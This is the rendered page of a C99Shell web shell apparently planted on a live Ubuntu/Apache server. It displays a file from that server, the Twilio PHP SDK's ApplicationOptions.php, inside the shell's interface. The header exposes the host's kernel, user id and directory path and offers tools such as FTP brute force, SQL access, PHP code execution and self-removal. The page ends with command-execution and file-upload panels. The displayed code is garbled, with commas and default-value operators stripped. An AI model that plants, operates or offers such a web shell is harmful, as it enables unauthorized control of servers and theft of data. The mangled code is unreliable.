!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/twilio/sdk/src/Twilio/Rest/Api/V2010/Account/   drwxr-xr-x
Free 13.12 GB of 57.97 GB (22.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ApplicationOptions.php (28.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\Rest\Api\V2010\Account;

use 
Twilio\Options;
use 
Twilio\Values;

abstract class 
ApplicationOptions {
    
/**
     * @param string $apiVersion The API version to use to start a new TwiML session
     * @param string $voiceUrl The URL to call when the phone number receives a call
     * @param string $voiceMethod The HTTP method to use with the voice_url
     * @param string $voiceFallbackUrl The URL to call when a TwiML error occurs
     * @param string $voiceFallbackMethod The HTTP method to use with
     *                                    voice_fallback_url
     * @param string $statusCallback The URL to send status information to your
     *                               application
     * @param string $statusCallbackMethod The HTTP method to use to call
     *                                     status_callback
     * @param bool $voiceCallerIdLookup Whether to lookup the caller's name
     * @param string $smsUrl The URL to call when the phone number receives an
     *                       incoming SMS message
     * @param string $smsMethod The HTTP method to use with sms_url
     * @param string $smsFallbackUrl The URL to call when an error occurs while
     *                               retrieving or executing the TwiML
     * @param string $smsFallbackMethod The HTTP method to use with sms_fallback_url
     * @param string $smsStatusCallback The URL to send status information to your
     *                                  application
     * @param string $messageStatusCallback The URL to send message status
     *                                      information to your application
     * @param string $friendlyName A string to describe the new resource
     * @param bool $publicApplicationConnectEnabled Whether to allow other Twilio
     *                                              accounts to dial this
     *                                              application
     * @return CreateApplicationOptions Options builder
     */
    
public static function create(string $apiVersion Values::NONEstring $voiceUrl Values::NONEstring $voiceMethod Values::NONEstring $voiceFallbackUrl Values::NONEstring $voiceFallbackMethod Values::NONEstring $statusCallback Values::NONEstring $statusCallbackMethod Values::NONEbool $voiceCallerIdLookup Values::NONEstring $smsUrl Values::NONEstring $smsMethod Values::NONEstring $smsFallbackUrl Values::NONEstring $smsFallbackMethod Values::NONEstring $smsStatusCallback Values::NONEstring $messageStatusCallback Values::NONEstring $friendlyName Values::NONEbool $publicApplicationConnectEnabled Values::NONE): CreateApplicationOptions {
        return new 
CreateApplicationOptions($apiVersion$voiceUrl$voiceMethod$voiceFallbackUrl$voiceFallbackMethod$statusCallback$statusCallbackMethod$voiceCallerIdLookup$smsUrl$smsMethod$smsFallbackUrl$smsFallbackMethod$smsStatusCallback$messageStatusCallback$friendlyName$publicApplicationConnectEnabled);
    }

    
/**
     * @param string $friendlyName The string that identifies the Application
     *                             resources to read
     * @return ReadApplicationOptions Options builder
     */
    
public static function read(string $friendlyName Values::NONE): ReadApplicationOptions {
        return new 
ReadApplicationOptions($friendlyName);
    }

    
/**
     * @param string $friendlyName A string to describe the resource
     * @param string $apiVersion The API version to use to start a new TwiML session
     * @param string $voiceUrl The URL to call when the phone number receives a call
     * @param string $voiceMethod The HTTP method to use with the voice_url
     * @param string $voiceFallbackUrl The URL to call when a TwiML error occurs
     * @param string $voiceFallbackMethod The HTTP method to use with
     *                                    voice_fallback_url
     * @param string $statusCallback The URL to send status information to your
     *                               application
     * @param string $statusCallbackMethod The HTTP method to use to call
     *                                     status_callback
     * @param bool $voiceCallerIdLookup Whether to lookup the caller's name
     * @param string $smsUrl The URL to call when the phone number receives an
     *                       incoming SMS message
     * @param string $smsMethod The HTTP method to use with sms_url
     * @param string $smsFallbackUrl The URL to call when an error occurs while
     *                               retrieving or executing the TwiML
     * @param string $smsFallbackMethod The HTTP method to use with sms_fallback_url
     * @param string $smsStatusCallback Same as message_status_callback.
     *                                  Deprecated, included for backwards
     *                                  compatibility.
     * @param string $messageStatusCallback The URL to send message status
     *                                      information to your application
     * @param bool $publicApplicationConnectEnabled Whether to allow other Twilio
     *                                              accounts to dial this
     *                                              application
     * @return UpdateApplicationOptions Options builder
     */
    
public static function update(string $friendlyName Values::NONEstring $apiVersion Values::NONEstring $voiceUrl Values::NONEstring $voiceMethod Values::NONEstring $voiceFallbackUrl Values::NONEstring $voiceFallbackMethod Values::NONEstring $statusCallback Values::NONEstring $statusCallbackMethod Values::NONEbool $voiceCallerIdLookup Values::NONEstring $smsUrl Values::NONEstring $smsMethod Values::NONEstring $smsFallbackUrl Values::NONEstring $smsFallbackMethod Values::NONEstring $smsStatusCallback Values::NONEstring $messageStatusCallback Values::NONEbool $publicApplicationConnectEnabled Values::NONE): UpdateApplicationOptions {
        return new 
UpdateApplicationOptions($friendlyName$apiVersion$voiceUrl$voiceMethod$voiceFallbackUrl$voiceFallbackMethod$statusCallback$statusCallbackMethod$voiceCallerIdLookup$smsUrl$smsMethod$smsFallbackUrl$smsFallbackMethod$smsStatusCallback$messageStatusCallback$publicApplicationConnectEnabled);
    }
}

class 
CreateApplicationOptions extends Options {
    
/**
     * @param string $apiVersion The API version to use to start a new TwiML session
     * @param string $voiceUrl The URL to call when the phone number receives a call
     * @param string $voiceMethod The HTTP method to use with the voice_url
     * @param string $voiceFallbackUrl The URL to call when a TwiML error occurs
     * @param string $voiceFallbackMethod The HTTP method to use with
     *                                    voice_fallback_url
     * @param string $statusCallback The URL to send status information to your
     *                               application
     * @param string $statusCallbackMethod The HTTP method to use to call
     *                                     status_callback
     * @param bool $voiceCallerIdLookup Whether to lookup the caller's name
     * @param string $smsUrl The URL to call when the phone number receives an
     *                       incoming SMS message
     * @param string $smsMethod The HTTP method to use with sms_url
     * @param string $smsFallbackUrl The URL to call when an error occurs while
     *                               retrieving or executing the TwiML
     * @param string $smsFallbackMethod The HTTP method to use with sms_fallback_url
     * @param string $smsStatusCallback The URL to send status information to your
     *                                  application
     * @param string $messageStatusCallback The URL to send message status
     *                                      information to your application
     * @param string $friendlyName A string to describe the new resource
     * @param bool $publicApplicationConnectEnabled Whether to allow other Twilio
     *                                              accounts to dial this
     *                                              application
     */
    
public function __construct(string $apiVersion Values::NONEstring $voiceUrl Values::NONEstring $voiceMethod Values::NONEstring $voiceFallbackUrl Values::NONEstring $voiceFallbackMethod Values::NONEstring $statusCallback Values::NONEstring $statusCallbackMethod Values::NONEbool $voiceCallerIdLookup Values::NONEstring $smsUrl Values::NONEstring $smsMethod Values::NONEstring $smsFallbackUrl Values::NONEstring $smsFallbackMethod Values::NONEstring $smsStatusCallback Values::NONEstring $messageStatusCallback Values::NONEstring $friendlyName Values::NONEbool $publicApplicationConnectEnabled Values::NONE) {
        
$this->options['apiVersion'] = $apiVersion;
        
$this->options['voiceUrl'] = $voiceUrl;
        
$this->options['voiceMethod'] = $voiceMethod;
        
$this->options['voiceFallbackUrl'] = $voiceFallbackUrl;
        
$this->options['voiceFallbackMethod'] = $voiceFallbackMethod;
        
$this->options['statusCallback'] = $statusCallback;
        
$this->options['statusCallbackMethod'] = $statusCallbackMethod;
        
$this->options['voiceCallerIdLookup'] = $voiceCallerIdLookup;
        
$this->options['smsUrl'] = $smsUrl;
        
$this->options['smsMethod'] = $smsMethod;
        
$this->options['smsFallbackUrl'] = $smsFallbackUrl;
        
$this->options['smsFallbackMethod'] = $smsFallbackMethod;
        
$this->options['smsStatusCallback'] = $smsStatusCallback;
        
$this->options['messageStatusCallback'] = $messageStatusCallback;
        
$this->options['friendlyName'] = $friendlyName;
        
$this->options['publicApplicationConnectEnabled'] = $publicApplicationConnectEnabled;
    }

    
/**
     * The API version to use to start a new TwiML session. Can be: `2010-04-01` or `2008-08-01`. The default value is the account's default API version.
     *
     * @param string $apiVersion The API version to use to start a new TwiML session
     * @return $this Fluent Builder
     */
    
public function setApiVersion(string $apiVersion): self {
        
$this->options['apiVersion'] = $apiVersion;
        return 
$this;
    }

    
/**
     * The URL we should call when the phone number assigned to this application receives a call.
     *
     * @param string $voiceUrl The URL to call when the phone number receives a call
     * @return $this Fluent Builder
     */
    
public function setVoiceUrl(string $voiceUrl): self {
        
$this->options['voiceUrl'] = $voiceUrl;
        return 
$this;
    }

    
/**
     * The HTTP method we should use to call `voice_url`. Can be: `GET` or `POST`.
     *
     * @param string $voiceMethod The HTTP method to use with the voice_url
     * @return $this Fluent Builder
     */
    
public function setVoiceMethod(string $voiceMethod): self {
        
$this->options['voiceMethod'] = $voiceMethod;
        return 
$this;
    }

    
/**
     * The URL that we should call when an error occurs retrieving or executing the TwiML requested by `url`.
     *
     * @param string $voiceFallbackUrl The URL to call when a TwiML error occurs
     * @return $this Fluent Builder
     */
    
public function setVoiceFallbackUrl(string $voiceFallbackUrl): self {
        
$this->options['voiceFallbackUrl'] = $voiceFallbackUrl;
        return 
$this;
    }

    
/**
     * The HTTP method we should use to call `voice_fallback_url`. Can be: `GET` or `POST`.
     *
     * @param string $voiceFallbackMethod The HTTP method to use with
     *                                    voice_fallback_url
     * @return $this Fluent Builder
     */
    
public function setVoiceFallbackMethod(string $voiceFallbackMethod): self {
        
$this->options['voiceFallbackMethod'] = $voiceFallbackMethod;
        return 
$this;
    }

    
/**
     * The URL we should call using the `status_callback_method` to send status information to your application.
     *
     * @param string $statusCallback The URL to send status information to your
     *                               application
     * @return $this Fluent Builder
     */
    
public function setStatusCallback(string $statusCallback): self {
        
$this->options['statusCallback'] = $statusCallback;
        return 
$this;
    }

    
/**
     * The HTTP method we should use to call `status_callback`. Can be: `GET` or `POST`.
     *
     * @param string $statusCallbackMethod The HTTP method to use to call
     *                                     status_callback
     * @return $this Fluent Builder
     */
    
public function setStatusCallbackMethod(string $statusCallbackMethod): self {
        
$this->options['statusCallbackMethod'] = $statusCallbackMethod;
        return 
$this;
    }

    
/**
     * Whether we should look up the caller's caller-ID name from the CNAM database (additional charges apply). Can be: `true` or `false`.
     *
     * @param bool $voiceCallerIdLookup Whether to lookup the caller's name
     * @return $this Fluent Builder
     */
    
public function setVoiceCallerIdLookup(bool $voiceCallerIdLookup): self {
        
$this->options['voiceCallerIdLookup'] = $voiceCallerIdLookup;
        return 
$this;
    }

    
/**
     * The URL we should call when the phone number receives an incoming SMS message.
     *
     * @param string $smsUrl The URL to call when the phone number receives an
     *                       incoming SMS message
     * @return $this Fluent Builder
     */
    
public function setSmsUrl(string $smsUrl): self {
        
$this->options['smsUrl'] = $smsUrl;
        return 
$this;
    }

    
/**
     * The HTTP method we should use to call `sms_url`. Can be: `GET` or `POST`.
     *
     * @param string $smsMethod The HTTP method to use with sms_url
     * @return $this Fluent Builder
     */
    
public function setSmsMethod(string $smsMethod): self {
        
$this->options['smsMethod'] = $smsMethod;
        return 
$this;
    }

    
/**
     * The URL that we should call when an error occurs while retrieving or executing the TwiML from `sms_url`.
     *
     * @param string $smsFallbackUrl The URL to call when an error occurs while
     *                               retrieving or executing the TwiML
     * @return $this Fluent Builder
     */
    
public function setSmsFallbackUrl(string $smsFallbackUrl): self {
        
$this->options['smsFallbackUrl'] = $smsFallbackUrl;
        return 
$this;
    }

    
/**
     * The HTTP method we should use to call `sms_fallback_url`. Can be: `GET` or `POST`.
     *
     * @param string $smsFallbackMethod The HTTP method to use with sms_fallback_url
     * @return $this Fluent Builder
     */
    
public function setSmsFallbackMethod(string $smsFallbackMethod): self {
        
$this->options['smsFallbackMethod'] = $smsFallbackMethod;
        return 
$this;
    }

    
/**
     * The URL we should call using a POST method to send status information about SMS messages sent by the application.
     *
     * @param string $smsStatusCallback The URL to send status information to your
     *                                  application
     * @return $this Fluent Builder
     */
    
public function setSmsStatusCallback(string $smsStatusCallback): self {
        
$this->options['smsStatusCallback'] = $smsStatusCallback;
        return 
$this;
    }

    
/**
     * The URL we should call using a POST method to send message status information to your application.
     *
     * @param string $messageStatusCallback The URL to send message status
     *                                      information to your application
     * @return $this Fluent Builder
     */
    
public function setMessageStatusCallback(string $messageStatusCallback): self {
        
$this->options['messageStatusCallback'] = $messageStatusCallback;
        return 
$this;
    }

    
/**
     * A descriptive string that you create to describe the new application. It can be up to 64 characters long.
     *
     * @param string $friendlyName A string to describe the new resource
     * @return $this Fluent Builder
     */
    
public function setFriendlyName(string $friendlyName): self {
        
$this->options['friendlyName'] = $friendlyName;
        return 
$this;
    }

    
/**
     * Whether to allow other Twilio accounts to dial this applicaton using Dial verb. Can be: `true` or `false`.
     *
     * @param bool $publicApplicationConnectEnabled Whether to allow other Twilio
     *                                              accounts to dial this
     *                                              application
     * @return $this Fluent Builder
     */
    
public function setPublicApplicationConnectEnabled(bool $publicApplicationConnectEnabled): self {
        
$this->options['publicApplicationConnectEnabled'] = $publicApplicationConnectEnabled;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.Api.V2010.CreateApplicationOptions ' $options ']';
    }
}

class 
ReadApplicationOptions extends Options {
    
/**
     * @param string $friendlyName The string that identifies the Application
     *                             resources to read
     */
    
public function __construct(string $friendlyName Values::NONE) {
        
$this->options['friendlyName'] = $friendlyName;
    }

    
/**
     * The string that identifies the Application resources to read.
     *
     * @param string $friendlyName The string that identifies the Application
     *                             resources to read
     * @return $this Fluent Builder
     */
    
public function setFriendlyName(string $friendlyName): self {
        
$this->options['friendlyName'] = $friendlyName;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.Api.V2010.ReadApplicationOptions ' $options ']';
    }
}

class 
UpdateApplicationOptions extends Options {
    
/**
     * @param string $friendlyName A string to describe the resource
     * @param string $apiVersion The API version to use to start a new TwiML session
     * @param string $voiceUrl The URL to call when the phone number receives a call
     * @param string $voiceMethod The HTTP method to use with the voice_url
     * @param string $voiceFallbackUrl The URL to call when a TwiML error occurs
     * @param string $voiceFallbackMethod The HTTP method to use with
     *                                    voice_fallback_url
     * @param string $statusCallback The URL to send status information to your
     *                               application
     * @param string $statusCallbackMethod The HTTP method to use to call
     *                                     status_callback
     * @param bool $voiceCallerIdLookup Whether to lookup the caller's name
     * @param string $smsUrl The URL to call when the phone number receives an
     *                       incoming SMS message
     * @param string $smsMethod The HTTP method to use with sms_url
     * @param string $smsFallbackUrl The URL to call when an error occurs while
     *                               retrieving or executing the TwiML
     * @param string $smsFallbackMethod The HTTP method to use with sms_fallback_url
     * @param string $smsStatusCallback Same as message_status_callback.
     *                                  Deprecated, included for backwards
     *                                  compatibility.
     * @param string $messageStatusCallback The URL to send message status
     *                                      information to your application
     * @param bool $publicApplicationConnectEnabled Whether to allow other Twilio
     *                                              accounts to dial this
     *                                              application
     */
    
public function __construct(string $friendlyName Values::NONEstring $apiVersion Values::NONEstring $voiceUrl Values::NONEstring $voiceMethod Values::NONEstring $voiceFallbackUrl Values::NONEstring $voiceFallbackMethod Values::NONEstring $statusCallback Values::NONEstring $statusCallbackMethod Values::NONEbool $voiceCallerIdLookup Values::NONEstring $smsUrl Values::NONEstring $smsMethod Values::NONEstring $smsFallbackUrl Values::NONEstring $smsFallbackMethod Values::NONEstring $smsStatusCallback Values::NONEstring $messageStatusCallback Values::NONEbool $publicApplicationConnectEnabled Values::NONE) {
        
$this->options['friendlyName'] = $friendlyName;
        
$this->options['apiVersion'] = $apiVersion;
        
$this->options['voiceUrl'] = $voiceUrl;
        
$this->options['voiceMethod'] = $voiceMethod;
        
$this->options['voiceFallbackUrl'] = $voiceFallbackUrl;
        
$this->options['voiceFallbackMethod'] = $voiceFallbackMethod;
        
$this->options['statusCallback'] = $statusCallback;
        
$this->options['statusCallbackMethod'] = $statusCallbackMethod;
        
$this->options['voiceCallerIdLookup'] = $voiceCallerIdLookup;
        
$this->options['smsUrl'] = $smsUrl;
        
$this->options['smsMethod'] = $smsMethod;
        
$this->options['smsFallbackUrl'] = $smsFallbackUrl;
        
$this->options['smsFallbackMethod'] = $smsFallbackMethod;
        
$this->options['smsStatusCallback'] = $smsStatusCallback;
        
$this->options['messageStatusCallback'] = $messageStatusCallback;
        
$this->options['publicApplicationConnectEnabled'] = $publicApplicationConnectEnabled;
    }

    
/**
     * A descriptive string that you create to describe the resource. It can be up to 64 characters long.
     *
     * @param string $friendlyName A string to describe the resource
     * @return $this Fluent Builder
     */
    
public function setFriendlyName(string $friendlyName): self {
        
$this->options['friendlyName'] = $friendlyName;
        return 
$this;
    }

    
/**
     * The API version to use to start a new TwiML session. Can be: `2010-04-01` or `2008-08-01`. The default value is your account's default API version.
     *
     * @param string $apiVersion The API version to use to start a new TwiML session
     * @return $this Fluent Builder
     */
    
public function setApiVersion(string $apiVersion): self {
        
$this->options['apiVersion'] = $apiVersion;
        return 
$this;
    }

    
/**
     * The URL we should call when the phone number assigned to this application receives a call.
     *
     * @param string $voiceUrl The URL to call when the phone number receives a call
     * @return $this Fluent Builder
     */
    
public function setVoiceUrl(string $voiceUrl): self {
        
$this->options['voiceUrl'] = $voiceUrl;
        return 
$this;
    }

    
/**
     * The HTTP method we should use to call `voice_url`. Can be: `GET` or `POST`.
     *
     * @param string $voiceMethod The HTTP method to use with the voice_url
     * @return $this Fluent Builder
     */
    
public function setVoiceMethod(string $voiceMethod): self {
        
$this->options['voiceMethod'] = $voiceMethod;
        return 
$this;
    }

    
/**
     * The URL that we should call when an error occurs retrieving or executing the TwiML requested by `url`.
     *
     * @param string $voiceFallbackUrl The URL to call when a TwiML error occurs
     * @return $this Fluent Builder
     */
    
public function setVoiceFallbackUrl(string $voiceFallbackUrl): self {
        
$this->options['voiceFallbackUrl'] = $voiceFallbackUrl;
        return 
$this;
    }

    
/**
     * The HTTP method we should use to call `voice_fallback_url`. Can be: `GET` or `POST`.
     *
     * @param string $voiceFallbackMethod The HTTP method to use with
     *                                    voice_fallback_url
     * @return $this Fluent Builder
     */
    
public function setVoiceFallbackMethod(string $voiceFallbackMethod): self {
        
$this->options['voiceFallbackMethod'] = $voiceFallbackMethod;
        return 
$this;
    }

    
/**
     * The URL we should call using the `status_callback_method` to send status information to your application.
     *
     * @param string $statusCallback The URL to send status information to your
     *                               application
     * @return $this Fluent Builder
     */
    
public function setStatusCallback(string $statusCallback): self {
        
$this->options['statusCallback'] = $statusCallback;
        return 
$this;
    }

    
/**
     * The HTTP method we should use to call `status_callback`. Can be: `GET` or `POST`.
     *
     * @param string $statusCallbackMethod The HTTP method to use to call
     *                                     status_callback
     * @return $this Fluent Builder
     */
    
public function setStatusCallbackMethod(string $statusCallbackMethod): self {
        
$this->options['statusCallbackMethod'] = $statusCallbackMethod;
        return 
$this;
    }

    
/**
     * Whether we should look up the caller's caller-ID name from the CNAM database (additional charges apply). Can be: `true` or `false`.
     *
     * @param bool $voiceCallerIdLookup Whether to lookup the caller's name
     * @return $this Fluent Builder
     */
    
public function setVoiceCallerIdLookup(bool $voiceCallerIdLookup): self {
        
$this->options['voiceCallerIdLookup'] = $voiceCallerIdLookup;
        return 
$this;
    }

    
/**
     * The URL we should call when the phone number receives an incoming SMS message.
     *
     * @param string $smsUrl The URL to call when the phone number receives an
     *                       incoming SMS message
     * @return $this Fluent Builder
     */
    
public function setSmsUrl(string $smsUrl): self {
        
$this->options['smsUrl'] = $smsUrl;
        return 
$this;
    }

    
/**
     * The HTTP method we should use to call `sms_url`. Can be: `GET` or `POST`.
     *
     * @param string $smsMethod The HTTP method to use with sms_url
     * @return $this Fluent Builder
     */
    
public function setSmsMethod(string $smsMethod): self {
        
$this->options['smsMethod'] = $smsMethod;
        return 
$this;
    }

    
/**
     * The URL that we should call when an error occurs while retrieving or executing the TwiML from `sms_url`.
     *
     * @param string $smsFallbackUrl The URL to call when an error occurs while
     *                               retrieving or executing the TwiML
     * @return $this Fluent Builder
     */
    
public function setSmsFallbackUrl(string $smsFallbackUrl): self {
        
$this->options['smsFallbackUrl'] = $smsFallbackUrl;
        return 
$this;
    }

    
/**
     * The HTTP method we should use to call `sms_fallback_url`. Can be: `GET` or `POST`.
     *
     * @param string $smsFallbackMethod The HTTP method to use with sms_fallback_url
     * @return $this Fluent Builder
     */
    
public function setSmsFallbackMethod(string $smsFallbackMethod): self {
        
$this->options['smsFallbackMethod'] = $smsFallbackMethod;
        return 
$this;
    }

    
/**
     * Same as message_status_callback: The URL we should call using a POST method to send status information about SMS messages sent by the application. Deprecated, included for backwards compatibility.
     *
     * @param string $smsStatusCallback Same as message_status_callback.
     *                                  Deprecated, included for backwards
     *                                  compatibility.
     * @return $this Fluent Builder
     */
    
public function setSmsStatusCallback(string $smsStatusCallback): self {
        
$this->options['smsStatusCallback'] = $smsStatusCallback;
        return 
$this;
    }

    
/**
     * The URL we should call using a POST method to send message status information to your application.
     *
     * @param string $messageStatusCallback The URL to send message status
     *                                      information to your application
     * @return $this Fluent Builder
     */
    
public function setMessageStatusCallback(string $messageStatusCallback): self {
        
$this->options['messageStatusCallback'] = $messageStatusCallback;
        return 
$this;
    }

    
/**
     * Whether to allow other Twilio accounts to dial this applicaton using Dial verb. Can be: `true` or `false`.
     *
     * @param bool $publicApplicationConnectEnabled Whether to allow other Twilio
     *                                              accounts to dial this
     *                                              application
     * @return $this Fluent Builder
     */
    
public function setPublicApplicationConnectEnabled(bool $publicApplicationConnectEnabled): self {
        
$this->options['publicApplicationConnectEnabled'] = $publicApplicationConnectEnabled;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.Api.V2010.UpdateApplicationOptions ' $options ']';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0112 ]--